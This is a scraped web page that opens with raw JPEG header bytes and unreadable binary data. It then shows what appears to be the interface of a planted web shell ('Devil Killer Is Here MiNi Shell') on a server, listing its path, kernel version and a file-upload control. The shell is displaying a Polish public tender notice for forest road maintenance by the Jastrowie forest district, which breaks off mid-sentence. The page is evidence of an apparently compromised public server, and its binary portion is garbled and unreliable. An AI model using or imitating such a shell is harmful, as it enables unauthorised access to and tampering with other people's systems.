JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230227/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230227/0011187401-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Utrzymanie dróg leśnych na terenie Nadleśnictwa Jastrowie w 2023 roku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Skarb Państwa Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Jastrowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 570064398</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Roosevelta 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jastrowie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-915</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL411 - Pilski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">jastrowie@pila.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://jastrowie.pila.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Skarb Państwa PGL LP Nadleśnictwo Jastrowie </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Gospodarka leśna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Utrzymanie dróg leśnych na terenie Nadleśnictwa Jastrowie w 2023 roku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-138b62c0-b689-11ed-b8d9-2a18c1f2976f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00111874</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-02-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia.pila.lasy.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zamowienia.pila.lasy.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Osobami uprawnionymi do porozumiewania się z Wykonawcami są w zakresie merytorycznym:<br/>p. Krzysztof Dietrich – w sprawach merytorycznych;<br/>e- mail: krzysztof.dietrich@pila.lasy.gov.pl<br/>p. Łukasz Opioła – w sprawach procedury udzielania zamówień publicznych<br/>e- mail: lukasz.opiola@pila.lasy.gov.pl od poniedziałku do piątku w godz. 7:00 – 15:00, z wyłączeniem dni wolnych od pracy. <br/>Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu platformy eZAMAWIAJĄCY oraz poczty elektronicznej z zastrzeżeniem, że składanie ofert odbywa się wyłącznie poprzez platformę przetargową eZAMAWIAJĄCY. Wykonawca zamierzający wziąć udział w niniejszym postępowaniu o udzielenie<br/>zamówienia publicznego, musi posiadać konto na platformie eZamawiający.<br/>Wykonawca posiadający konto na ww. platformie ma dostęp do formularzy: złożenia, zmiany, wycofania oferty oraz do formularza do komunikacji. Ogólne zasady korzystania z Platformy:<br/>1)zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu<br/>na subdomenie Regionalnej Dyrekcji Lasów Państwowych w Pile pod adresem<br/>internetowym Platforma eZamawiający - https://zamowienia.pila.lasy.gov.pl/ lub<br/>Platforma Zakupowa Marketplanet https://oneplace.marketplanet.pl.<br/>2)Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie<br/>przekierowany do strony Platforma Zakupowa Marketplanet<br/>https://oneplace.marketplanet.pl/, gdzie zostanie powiadomiony o możliwości<br/>zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto<br/>wykonując kroki procesu rejestracyjnego: podaje adres e-mail, ustanawia hasło,<br/>następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika<br/>polecenie „zarejestruj się”;<br/>3)rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym<br/>Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację<br/>w procesie złożenia Oferty w postaci elektronicznej. Wykonawca wraz<br/>z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma informacje, o<br/>możliwości przyspieszenia procedury założenia konta, wówczas należy skontaktować<br/>się pod numerem telefonu podanym w ww. potwierdzeniu;<br/>4)po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu<br/>oraz sporządzania, wysyłania i odbierania korespondencji elektronicznej;<br/>5)Ofertę wraz z wymaganymi załącznikami składa się w postaci elektronicznej,<br/>opatrzonych kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub<br/>podpisem osobistym przez osoby umocowane, pod rygorem nieważności na<br/>Platformie eZamawiający pod adresem internetowym:<br/>https://zamowienia.pila.lasy.gov.pl/ w zakładce „Oferty”. 6)korzystanie z Platformy eZamawiający jest bezpłatne. Zamawiający określa niezbędne wymagania sprzętowo-aplikacyjne umożliwiające<br/>pracę na Platformie eZamawiający, tj.:<br/>1)stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż<br/>512 kb/s;<br/>2)komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram,<br/>procesor Intel IV 2GHZ, jeden z systemów operacyjnych - MS Windows 7, Mac Os<br/>x 10.4, Linux, lub ich nowsze wersje;<br/>3)zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej<br/>w najnowszej wersji, w przypadku Internet Explorer minimalnie wersja 10.0;<br/>4)włączona obsługa JavaScript;<br/>5)zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf. Zamawiający określa dopuszczalne formaty przesyłanych danych, tj.: plików o<br/>wielkości do 100 MB w txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, docx, xlsx, csv, jpg, jpeg, tif, png, svg, zip, tar, gz, gzip, 7z, XAdES, CAdES, PAdES.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku<br/>z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie<br/>danych osobowych)(Dz. Urz. UE L 119 z 04 maja 2016 r., str. 1 – dalej „RODO”)<br/>Zamawiający informuje, iż administratorem danych osobowych jest Nadleśnictwo Jastrowie. Zamawiający przetwarza dane osobowe zebrane w niniejszym postępowaniu o udzielenie zamówienia publicznego w sposób gwarantujący zabezpieczenie przed ich bezprawnym rozpowszechnianiem.<br/>Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale VI PZP, do upływu terminu do ich wniesienia. Do przetwarzania danych osobowych, o których mowa w art. 10 RODO mogą być<br/>dopuszczone wyłącznie osoby posiadające upoważnienie. Osoby dopuszczone do przetwarzania takich danych są obowiązane do zachowania ich w poufności. Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego oraz jego rozstrzygnięciem, jak również, jeżeli nie ziszczą się przesłanki określone w art. 255-256 PZP – w celu zawarcia umowy w sprawie zamówienia publicznego oraz jej realizacji, a także udokumentowania postępowania o udzielenie zamówienia i jego archiwizacji. Odbiorcami danych osobowych będą osoby lub podmioty, którym dokumentacja postępowania zostanie udostępniona w oparciu o przepisy PZP.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania<br/>o udzielenie zamówienia publicznego będą przechowywane, zgodnie z art. 97 ust. 1<br/>PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia<br/>publicznego, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania<br/>obejmuje cały czas trwania umowy w sprawie zamówienia publicznego. Niezależnie od postanowień pkt 19.7. powyżej, w przypadku zawarcia umowy w<br/>sprawie zamówienia publicznego, dane osobowe będą przetwarzane do upływu<br/>okresu przedawnienia roszczeń wynikających z umowy w sprawie zamówienia<br/>publicznego. Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania<br/>o udzielenie zamówienia mogą zostać przekazane podmiotom świadczącym usługi<br/>doradcze, w tym usługi prawne i konsultingowe. Stosownie do art. 22 RODO, decyzje dotyczące danych osobowych nie będą<br/>podejmowane w sposób zautomatyzowany. Osoba, której dotyczą pozyskane w związku z prowadzeniem niniejszego<br/>postępowania dane osobowe, ma prawo: 1) dostępu do swoich danych osobowych – zgodnie z art. 15 RODO, przy czym<br/>w sytuacji, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1 -3<br/>RODO wymagałoby niewspółmiernie dużego wysiłku Zamawiający może<br/>żądać wskazania dodatkowych informacji mających na celu sprecyzowanie<br/>żądania, w szczególności podania nazwy lub daty bieżącego bądź<br/>zakończonego postępowania o udzielenie zamówienia publicznego;<br/>2) do sprostowana swoich danych osobowych – zgodnie z art. 16 RODO, przy<br/>czym skorzystanie z uprawnienia do sprostowania lub uzupełnienia danych<br/>osobowych, o którym mowa w art. 16 RODO, nie może skutkować zmianą<br/>wyniku postępowania o udzielenie zamówienia publicznego, ani zmianą<br/>postanowień umowy w zakresie niezgodnym z PZP oraz nie może naruszać<br/>integralności protokołu oraz jego załączników;<br/>3) do żądania od Zamawiającego – jako administratora, ograniczenia<br/>przetwarzania danych osobowych z zastrzeżeniem przypadków, o których<br/>mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania<br/>nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby<br/>fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego<br/>Unii Europejskiej lub państwa członkowskiego; prawo to nie ogranicza<br/>przetwarzania danych osobowych do czasu zakończenia postępowania o<br/>udzielenie zamówienia publicznego;<br/>4) wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych w<br/>przypadku uznania, iż przetwarzanie jej danych osobowych narusza przepisy<br/>o ochronie danych osobowych, w tym przepisy RODO. Obowiązek podania danych osobowych jest wymogiem ustawowym określonym w<br/>przepisach PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia<br/>publicznego; konsekwencje niepodania określonych danych określa PZP. Osobie, której dane osobowe zostały pozyskane przez Zamawiającego w związku z<br/>prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego nie<br/>przysługuje:<br/>1) prawo do usunięcia danych osobowych, o czym przesadza art. 17 ust. 3 lit. b,<br/>d lub e RODO,<br/>2) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>określone w art. 21 RODO prawo sprzeciwu wobec przetwarzania danych<br/>osobowych, a to z uwagi na fakt, że podstawą prawną przetwarzania danych<br/>osobowych jest art. 6 ust. 1 lit. c RODO. Dane osobowe mogą być przekazywane do organów publicznych i urzędów<br/>państwowych lub innych podmiotów upoważnionych na podstawie przepisów prawa<br/>lub wykonujących zadania realizowane w interesie publicznym lub w ramach<br/>sprawowania władzy publicznej, w szczególności do podmiotów prowadzących<br/>działalność kontrolną wobec Zamawiającego. Dane osobowe są przekazywane do<br/>podmiotów przetwarzających dane w imieniu administratora danych osobowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SA.270.1.2.2023_03</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest robota budowlana polegająca na „Utrzymaniu dróg leśnych na terenie Nadleśnictwa Jastrowie w 2023 roku”. Szczegółowy opis przedmiotu zamówienia zamieszczono w Załącznikach nr 4 i 5 do SWZ. Zamawiający nie dokonał podziału zamówienia na części ze względów<br/>technologicznych i wykonawczych oraz racjonalnego wydatkowania środków<br/>publicznych. Podział zamówienia na części groziłby nadmiernymi trudnościami<br/>technicznymi i kosztami wykonania zamówienia, a także potrzebą skoordynowania działań różnych wykonawców realizujących poszczególne części zamówienia. Ponadto istniałoby ryzyko niewykonania części zamówienia, co uniemożliwiłoby właściwe funkcjonowanie całego systemu. Nazwy i kody dotyczące przedmiotu zamówienia określone zgodnie ze Wspólnym<br/>Słownikiem Zamówień (CPV):<br/>45000000-7 – Roboty budowlane,<br/>45233120-6 – Roboty w zakresie budowy dróg,<br/>45100000-8 – Przygotowanie terenu pod budowę,<br/>45112000-5 – Roboty w zakresie usuwania gleby,<br/>Szczegółowy zakres prac, jakie w ramach przedmiotu zamówienia ma wykonać<br/>Wykonawca zawarty jest w:<br/>a) Opisie robót,<br/>b) Przedmiarze robót. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45112000-5 - Roboty w zakresie usuwania gleby</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-29</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art.<br/>214 ust. 1 pkt 7 PZP, w okresie 3 lat od dnia udzielenia zamówienia podstawowego,<br/>o wartości do 30% wartości zamówienia podstawowego. Zamówienia te polegać będą<br/>na powtórzeniu podobnych robót stanowiących przedmiot niniejszego zamówienia, tj. prac z zakresu budowy drogi. Zamówienia, o których mowa w pkt 5.1. będą polegały na powtórzeniu robót budowlanych zgodnych z robotami stanowiącymi przedmiot niniejszego zamówienia.<br/>Zakresem rzeczowym robót budowlanych stanowiących przedmiot zamówień, o których mowa w pkt 5.1. będą prace z zakresu budowy, przebudowy dróg obejmujące czynności wskazane rodzajowo w rozdziale 3 SWZ, w załącznikach nr 4 i 5 do SWZ i czynności wskazane powyżej.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze ofert zamówienia Zamawiający będzie się kierował następującymi<br/>kryteriami oceny ofert:<br/>1) Cena - 60 %,<br/>2) Gwarancja - 40 %,<br/>14.2. Sposób obliczania punktów dla poszczególnych kryteriów:<br/>1) W ramach kryterium „Cena” ocena ofert zostanie dokonana przy<br/>zastosowaniu wzoru:<br/>Cn<br/>C = ------------ x100 pkt x 60 %<br/>Co<br/>gdzie:<br/>C – liczba punktów w ramach kryterium „Cena”,<br/>Cn - najniższa cena spośród ofert ocenianych<br/>Co - cena oferty ocenianej<br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena brutto za<br/>wykonanie całego zamówienia podana w formularzu Oferty (Załącznik nr 1<br/>do SWZ).<br/>Z uwagi na postanowienia art. 225 ust. 1 PZP, jeżeli złożono ofertę, której<br/>wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego<br/>zgodnie z przepisami o podatku od towarów i usług, Zamawiający w celu<br/>oceny takiej oferty dolicza do przedstawionej w niej ceny podatek od towarów<br/>i usług, który miałby obowiązek rozliczyć zgodnie z tymi przepisami.<br/>3) W ramach kryterium „Gwarancja” Zamawiający dokona oceny ofert w<br/>następujący sposób: Oferty w tym kryterium oceniane będą w odniesieniu do najdłuższego terminu<br/>gwarancji przedstawionego przez Wykonawców zastrzegając, iż minimalny<br/>termin gwarancji wynosi 12 miesiące, przy uwzględnieniu następujących<br/>zasad oceny punktowej:<br/>- 0 pkt – 12 miesięcy gwarancji,<br/>- 20 pkt – 18 miesięcy gwarancji,<br/>- 40 pkt – 24 i więcej miesięcy gwarancji.<br/>Informacje dotyczące terminu gwarancji Wykonawca poda w formularzu<br/>oferty – załączniku nr 1 do SWZ. W przypadku niepodania informacji<br/>dotyczących terminu gwarancji w formularzu oferty, do oceny punktowej<br/>przyjęty zostanie minimalny termin gwarancji wynoszący 12 miesięcy, i taki<br/>termin zostanie wskazany w umowie. Oferta z najdłuższym terminem<br/>gwarancji otrzyma maksymalną liczbę punktów, Za najkorzystniejszą ofertę uznana zostanie oferta, która uzyska największą sumę punktów uzyskanych w ww. kryteriach oceny ofert. Oferta może uzyskać maksymalnie 100 punktów. Jeżeli nie można dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty o takiej samej cenie lub koszcie, zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez zamawiającego ofert dodatkowych zawierających nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W postępowaniu mogą brać udział Wykonawcy, którzy spełniają warunki udziału<br/>w postępowaniu, dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym.<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania<br/>tego warunku udziału w postępowaniu.<br/>2) uprawnień do prowadzenia określonej działalności zawodowej, o ile<br/>wynika to z odrębnych przepisów.<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania<br/>tego warunku udziału w postępowaniu.<br/>3) sytuacji ekonomicznej lub finansowej. - Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania<br/>warunku udziału w postępowaniu w odniesieniu do warunku dot. zdolności<br/>ekonomicznej.<br/>- Warunek w odniesieniu do sytuacji finansowej, zostanie spełniony, jeśli<br/>Wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową nie mniejszą niż: 80.000,00 zł. zdolności technicznej lub zawodowej:<br/>a) Warunek ten, w zakresie doświadczenia, zostanie uznany za<br/>spełniony, jeśli Wykonawca wykaże, że nie wcześniej niż w okresie<br/>ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy -<br/>w tym okresie:<br/> zrealizował lub realizuje (przy czym w tym przypadku będzie<br/>liczona wartość zrealizowanej części przedmiotu umowy) co<br/>najmniej 1 robotę budowlaną (przez robotę budowlaną rozumie<br/>się wykonywanie prac na podstawie 1 umowy) polegającą na<br/>wykonywaniu prac z zakresu remontu, utrzymania, 